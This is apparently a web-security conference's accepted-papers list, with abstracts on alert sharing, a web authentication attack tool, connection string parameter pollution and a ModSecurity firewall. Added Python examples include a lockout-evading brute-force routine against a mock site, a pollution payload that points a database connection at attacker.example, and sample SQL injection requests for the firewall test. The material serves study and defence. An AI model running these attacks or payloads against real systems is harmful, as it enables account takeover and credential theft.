Accepted Papers

A semantic web approach to share alerts among Security Information Management Systems
Jorge E. López de Vergara, Víctor A. Villagrá, Pilar Holgado, Elena de Frutos, Iván Sanz

This paper presents a semantic web based architecture to share alerts among Security Information Management Systems (SIMS). Such an architecture is useful when two or more SIMS in different domains need to know about alerts occurring in the other domains, which enables an early response to network incidents. For this, an ontology has been defined to describe the knowledge base of each SIMS that holds its security alerts. These knowledge bases can be queried from other SIMS using standard semantic web protocols. Two modules have been implemented: one to insert new security alerts into the knowledge base, and another to query such knowledge bases. The performance of both modules has been evaluated and results are reported.
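Added illustration, not part of the paper or of this page: the two modules the abstract describes, reduced to a small in-memory triple store per SIMS with an insertion routine (alert to ontology properties), an N-Triples serialisation for interchange, and a basic-graph-pattern query that stands in for a SPARQL endpoint. The ontology namespace, the domain names and the alerts are constructed for illustration; the cross-domain query at the end finds source addresses that more than one SIMS has flagged.

```python
"""Alert sharing between two SIMS knowledge bases, modelled as RDF-style
triples with a small basic-graph-pattern matcher standing in for a SPARQL
endpoint. Added example, not the paper's implementation; the ontology
terms, domain names and alerts below are constructed for illustration."""
from collections import defaultdict
from itertools import count

NS = "http://example.org/sims-alerts#"   # hypothetical ontology namespace
_ids = count(1)


class TripleStore:
    """Minimal in-memory triple store: the knowledge base of one SIMS."""

    def __init__(self, domain):
        self.domain = domain
        self.triples = set()

    def insert_alert(self, source_ip, target_port, classification, analyzer):
        """Insertion module: map one alert onto ontology properties."""
        subj = f"{NS}alert/{self.domain}/{next(_ids)}"
        for pred, obj in (("sourceIP", source_ip), ("targetPort", target_port),
                          ("classification", classification),
                          ("analyzer", analyzer), ("domain", self.domain)):
            self.triples.add((subj, NS + pred, obj))
        return subj

    def serialize_ntriples(self):
        """Interchange form: N-Triples lines another SIMS could load."""
        lines = []
        for s, p, o in sorted(self.triples):
            o_str = f"<{o}>" if o.startswith("http") else f'"{o}"'
            lines.append(f"<{s}> <{p}> {o_str} .")
        return "\n".join(lines)

    def query(self, patterns, binding=None):
        """Query module: match a list of (s, p, o) patterns; terms that start
        with '?' are variables and must bind consistently across patterns."""
        binding = binding or {}
        if not patterns:
            return [binding]
        head, rest = patterns[0], patterns[1:]
        results = []
        for triple in self.triples:
            new, ok = dict(binding), True
            for term, value in zip(head, triple):
                if term.startswith("?"):
                    if new.get(term, value) != value:
                        ok = False
                        break
                    new[term] = value
                elif term != value:
                    ok = False
                    break
            if ok:
                results.extend(self.query(rest, new))
        return results


def federated_query(stores, patterns):
    """Run one pattern against every domain's knowledge base."""
    return [dict(b, domain=s.domain) for s in stores for b in s.query(patterns)]


def shared_attackers(stores):
    """Source addresses flagged in more than one domain: the cross-domain
    signal that lets a SIMS react before the attacker reaches it."""
    seen = defaultdict(set)
    for b in federated_query(stores, [("?alert", NS + "sourceIP", "?ip"),
                                      ("?alert", NS + "domain", "?dom")]):
        seen[b["?ip"]].add(b["?dom"])
    return sorted(ip for ip, domains in seen.items() if len(domains) > 1)


def build_sample_stores():
    """Constructed sample data: two SIMS domains, one address seen by both."""
    a, b = TripleStore("domainA"), TripleStore("domainB")
    a.insert_alert("203.0.113.7", "22", "ssh-bruteforce", "ids-A")
    a.insert_alert("198.51.100.2", "80", "sqli-attempt", "ids-A")
    b.insert_alert("203.0.113.7", "445", "smb-scan", "ids-B")
    b.insert_alert("192.0.2.9", "25", "spam-relay", "ids-B")
    return a, b


if __name__ == "__main__":
    stores = build_sample_stores()
    print(stores[0].serialize_ntriples())
    print("seen in both domains:", shared_attackers(stores))
```

A real deployment would expose each knowledge base over a SPARQL endpoint and send the second pattern set as a federated query; the matcher here is only the minimum needed to show how one ontology makes alerts from different SIMS joinable on a shared property such as the source address.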


WASAT - A New Web Authorization Security Analysis Tool
Carmen Torrano-Gimenez, Alejandro Perez-Villegas and Gonzalo Alvarez

WASAT (Web Authentication Security Analysis Tool) is an intuitive and complete application designed to assess the security of web related authentication schemes, namely Basic Authentication and Forms-Based Authentication. WASAT is able to mount dictionary and brute force attacks of variable complexity against the target web site. Password files use a syntax that generates different password search spaces. An important feature of the tool is that low-signature attacks can be performed to avoid detection by anti-brute-force mechanisms. The tool is platform-independent and multithreaded, letting the user control the speed of the attack. WASAT offers features missing from many similar applications while avoiding most of their drawbacks, making it a strong tool for security analysis.
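Added illustration, not WASAT's code and not part of the paper: a dictionary attack on HTTP Basic Authentication built from the three pieces the abstract names, a pattern that expands into a password search space, the credential encoding itself, and a pacing policy that keeps the attack under an account-lockout threshold (the "low-signature" case). The mask syntax is an assumption and not WASAT's password-file format; the target is an in-process mock with a constructed lockout rule, so the example runs offline and counts how often the anti-brute-force mechanism fires.

```python
"""Dictionary attack on HTTP Basic Authentication, paced so that it stays
under an account-lockout threshold (a 'low-signature' attack). Added
example, not WASAT's code: the mask syntax and the in-process mock target
are assumptions made for illustration."""
import base64
import itertools
import string

# Hypothetical mask syntax (assumption, not WASAT's password-file format):
# '?d' = digit, '?l' = lowercase letter, '?u' = uppercase letter; anything
# else is literal. "pass?d?d" expands to pass00 .. pass99.
CLASSES = {"d": string.digits, "l": string.ascii_lowercase,
           "u": string.ascii_uppercase}


def expand_mask(mask):
    """Yield every password in the search space described by the mask."""
    parts, i = [], 0
    while i < len(mask):
        if mask[i] == "?" and i + 1 < len(mask) and mask[i + 1] in CLASSES:
            parts.append(CLASSES[mask[i + 1]])
            i += 2
        else:
            parts.append(mask[i])
            i += 1
    for combo in itertools.product(*parts):
        yield "".join(combo)


def basic_auth_header(user, password):
    """Authorization header value for Basic auth: base64('user:password')."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return f"Basic {token}"


class MockBasicAuthSite:
    """Constructed stand-in for the target: Basic auth plus an anti-brute-force
    rule that locks an account after `threshold` failures within `window` s."""

    def __init__(self, credentials, threshold=5, window=60.0):
        self.credentials = credentials
        self.threshold, self.window = threshold, window
        self.failures = {}          # user -> timestamps of recent failures
        self.lockouts = 0           # how often the lockout fired (our 'signature')

    def request(self, auth_header, now):
        scheme, _, token = auth_header.partition(" ")
        if scheme != "Basic":
            return 401
        user, _, password = base64.b64decode(token).decode().partition(":")
        recent = [t for t in self.failures.get(user, []) if now - t < self.window]
        self.failures[user] = recent
        if len(recent) >= self.threshold:
            self.lockouts += 1
            return 403              # locked: even the right password is refused
        if self.credentials.get(user) == password:
            return 200
        recent.append(now)
        return 401


def naive_attack(site, users, passwords):
    """Full speed, no pacing: every attempt lands at the same instant."""
    found, attempts = {}, 0
    for password in passwords:
        for user in users:
            if user not in found:
                attempts += 1
                if site.request(basic_auth_header(user, password), 0.0) == 200:
                    found[user] = password
    return found, attempts


def low_signature_attack(site, users, passwords, threshold, window):
    """Interleave users and space each user's attempts window/(threshold-1)
    seconds apart, so fewer than `threshold` failures ever fall inside one
    window and the lockout never fires. Returns (found, attempts, seconds)."""
    pace = window / (threshold - 1)     # spacing between one user's attempts
    step = pace / len(users)            # global spacing, users interleaved
    found, attempts, now = {}, 0, 0.0
    for password in passwords:
        for user in users:
            if user not in found:
                attempts += 1
                if site.request(basic_auth_header(user, password), now) == 200:
                    found[user] = password
            now += step                 # advance even when skipping a user
        if len(found) == len(users):
            break
    return found, attempts, now


if __name__ == "__main__":
    creds = {"alice": "pass42", "bob": "pass07"}     # constructed target accounts
    candidates = list(expand_mask("pass?d?d"))
    noisy = MockBasicAuthSite(creds)
    print("naive:", naive_attack(noisy, list(creds), candidates), "lockouts", noisy.lockouts)
    quiet = MockBasicAuthSite(creds)
    print("paced:", low_signature_attack(quiet, list(creds), candidates, 5, 60.0),
          "lockouts", quiet.lockouts)
```

Against the mock, the unpaced run locks both accounts after five failures and never recovers either password, while the paced run recovers both without a single lockout, at the cost of simulated time; the threshold and window are exactly the two numbers an assessor has to estimate about the target before choosing the pace.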


Connection String Parameter Pollution Attacks
Chema Alonso, Manuel Fernandez, Alejandro Martín and Antonio Guzmán

The 2007 edition of the classification of the ten most critical vulnerabilities for the security of a system (the OWASP Top Ten) placed code injection attacks second, behind XSS attacks; in the current edition, code injection attacks are ranked first. In fact, the most critical attacks are those that combine XSS techniques to reach systems with code injection techniques to reach the information they hold. The potential damage associated with this kind of threat, the total absence of prior work on it, and the fact that the mitigation must be implemented both by systems administrators and by database vendors justify an in-depth analysis to identify all the possible ways of carrying out this attack technique.
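Added illustration, not part of the paper: the mechanism connection string parameter pollution relies on, reduced to a few lines. The parser imitates the rule documented for the .NET SqlConnection connection string (semicolon-separated key=value pairs, case-insensitive keys, optional quoting, and when a key is repeated the last occurrence wins), an application that concatenates a user-supplied password into the string, and a builder-style construction that quotes values the way SqlConnectionStringBuilder does. The application, host names and attacker input are constructed.

```python
"""Connection String Parameter Pollution (CSPP) in miniature. Added example,
not the paper's code. The parser imitates the rule documented for the .NET
SqlConnection connection string: 'key=value' pairs separated by ';', keys
case-insensitive, values optionally quoted, and when a key is repeated the
LAST occurrence wins. Application, hosts and values are constructed."""


def _split_pairs(cs):
    """Split on ';' outside quotes; a doubled quote inside a quoted value
    is a literal quote character."""
    pairs, buf, quote, i = [], [], None, 0
    while i < len(cs):
        ch = cs[i]
        if quote:
            if ch == quote and i + 1 < len(cs) and cs[i + 1] == quote:
                buf.append(ch)
                i += 2
                continue
            buf.append(ch)
            if ch == quote:
                quote = None
        elif ch in "'\"":
            quote = ch
            buf.append(ch)
        elif ch == ";":
            pairs.append("".join(buf))
            buf = []
        else:
            buf.append(ch)
        i += 1
    pairs.append("".join(buf))
    return [p for p in pairs if p.strip()]


def parse_connection_string(cs):
    """Return {lowercased key: value}; a repeated key keeps its last value."""
    params = {}
    for pair in _split_pairs(cs):
        if "=" not in pair:
            continue
        key, _, value = pair.partition("=")
        key, value = key.strip().lower(), value.strip()
        if len(value) >= 2 and value[0] == value[-1] and value[0] in "'\"":
            value = value[1:-1]
        if key:
            params[key] = value     # last occurrence wins
    return params


def vulnerable_build(user, password):
    """String concatenation: user-controlled values are pasted in raw."""
    return (f"Data Source=db.internal;Initial Catalog=Shop;"
            f"User ID={user};Password={password}")


def hardened_build(user, password):
    """Builder-style construction: every value is double-quoted and embedded
    quotes are doubled, so a value can never add a key=value pair of its
    own (the approach SqlConnectionStringBuilder takes)."""
    def quote(value):
        return '"' + value.replace('"', '""') + '"'
    return (f"Data Source=db.internal;Initial Catalog=Shop;"
            f"User ID={quote(user)};Password={quote(password)}")


# Constructed attacker input: a 'password' that appends two new parameters.
# The repeated Data Source overrides the real one, and Integrated Security
# makes the server authenticate with its own Windows identity instead of
# the supplied credentials.
PAYLOAD = "secret;Data Source=attacker.example;Integrated Security=true"


def demo(user="shopuser", password=PAYLOAD):
    """Where each build sends the connection, and what it does with the value."""
    polluted = parse_connection_string(vulnerable_build(user, password))
    safe = parse_connection_string(hardened_build(user, password))
    return {
        "vulnerable_target": polluted["data source"],
        "vulnerable_integrated": polluted.get("integrated security"),
        "hardened_target": safe["data source"],
        "hardened_password": safe["password"],
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k:22} {v}")
```

The point a reviewer should take from the two builders is that the fix belongs where the string is assembled: the parser's last-occurrence-wins rule is by design, so only quoting (or rejecting) attacker-influenced values keeps them from introducing parameters of their own.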


Web Applications Security Assessment in the Portuguese World Wide Web panorama
Nuno Teodoro, Carlos Serrão

Following the EU Information and Communication Technologies agenda, the Portuguese Government has started to build many applications that enable electronic interaction between individuals, companies and the public administration: the e-Government. Because of the open nature of the Internet and the sensitivity of the data those applications handle, it is important to ensure and assess their security. Financial institutions such as banks, which nowadays use the WWW as a communication channel with their customers, face the same challenges.
The main objective of this paper is to introduce work that will be carried out to assess the security of web applications in the financial and public administration sectors. The authors describe the rationale behind this work, which involves the selection of a set of key financial and public administration web applications, the definition and application of a security assessment methodology, and the evaluation of the assessment results.


Building web application firewalls in high availability environments
Juan Galiana Lara, Àngel Puigventós Gracia

The number of web applications and web services grows every day as systems migrate to this kind of environment. In these scenarios it is very common to find all kinds of vulnerabilities affecting web applications, and traditional protection at the network and transport layers is not enough to mitigate them. Moreover, there are situations in which the availability of the information systems is vital for proper operation. To protect our systems from these threats we need a component acting at layer 7 of the OSI model, which lets us analyse HTTP and HTTPS traffic and which is easy to scale. To address these problems, the paper presents the design and implementation of an open source application firewall based on ModSecurity, emphasising the use of the positive security model and deployment in high availability environments.
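Added illustration, not the paper's ModSecurity rule set: the decision logic of a positive security model, where every request must match an explicit profile of endpoint, parameter names and per-parameter format, and anything outside the profile is denied by default. The profile and the sample requests are constructed; in ModSecurity the same whitelist is expressed as rules over the ARGS_NAMES and ARGS collections with a deny action, but the logic below is what those rules implement.

```python
"""Positive security model for a web application firewall: every request
must match an explicit profile (endpoint, parameter names, per-parameter
format); anything else is denied. Added example, not the paper's
ModSecurity rule set; the profile and sample requests are constructed."""
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed profile for a hypothetical application: allowed endpoints and,
# for each, the parameters it accepts with the format each must have.
PROFILE = {
    ("GET", "/products"): {"id": r"[0-9]{1,6}", "page": r"[0-9]{1,3}"},
    ("POST", "/login"):   {"user": r"[a-z0-9._-]{1,32}", "pass": r".{8,64}"},
}
MAX_VALUE_LEN = 256


def inspect_request(method, url, body=""):
    """Return (allowed, reason). Default deny: unknown endpoints, unknown or
    repeated parameters, oversized or malformed values are all refused."""
    parts = urlsplit(url)
    rules = PROFILE.get((method, parts.path))
    if rules is None:
        return False, f"no profile for {method} {parts.path}"
    params = parse_qsl(parts.query, keep_blank_values=True)
    if method == "POST":
        params += parse_qsl(body, keep_blank_values=True)
    seen = set()
    for name, value in params:
        if name not in rules:
            return False, f"unexpected parameter {name!r}"
        if name in seen:
            return False, f"parameter {name!r} repeated (HTTP parameter pollution)"
        seen.add(name)
        if len(value) > MAX_VALUE_LEN:
            return False, f"parameter {name!r} exceeds {MAX_VALUE_LEN} bytes"
        if not re.fullmatch(rules[name], value):
            return False, f"parameter {name!r} does not match its profile"
    return True, "matches profile"


SAMPLE_REQUESTS = [   # constructed: (method, url, body)
    ("GET", "/products?id=42&page=1", ""),
    ("GET", "/products?id=42'%20OR%20'1'='1", ""),     # SQL injection attempt
    ("GET", "/products?id=42&debug=1", ""),            # parameter not profiled
    ("GET", "/products?id=1&id=2", ""),                # repeated parameter
    ("POST", "/login", "user=alice&pass=correct-horse"),
    ("GET", "/admin/export", ""),                      # endpoint not profiled
]


def run(requests=SAMPLE_REQUESTS):
    """Inspect each sample request; returns [(method, url, allowed, reason)]."""
    return [(m, u) + inspect_request(m, u, b) for m, u, b in requests]


if __name__ == "__main__":
    for method, url, allowed, reason in run():
        print("ALLOW" if allowed else "DENY ", method, url, "-", reason)
```

Note that the injection attempt is refused without any signature for SQL: the value simply is not a number. That is the strength of the positive model and also its operational cost, since the profile has to be kept in step with the application, which is why the paper pairs it with a high availability deployment rather than treating the firewall as an optional add-on.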
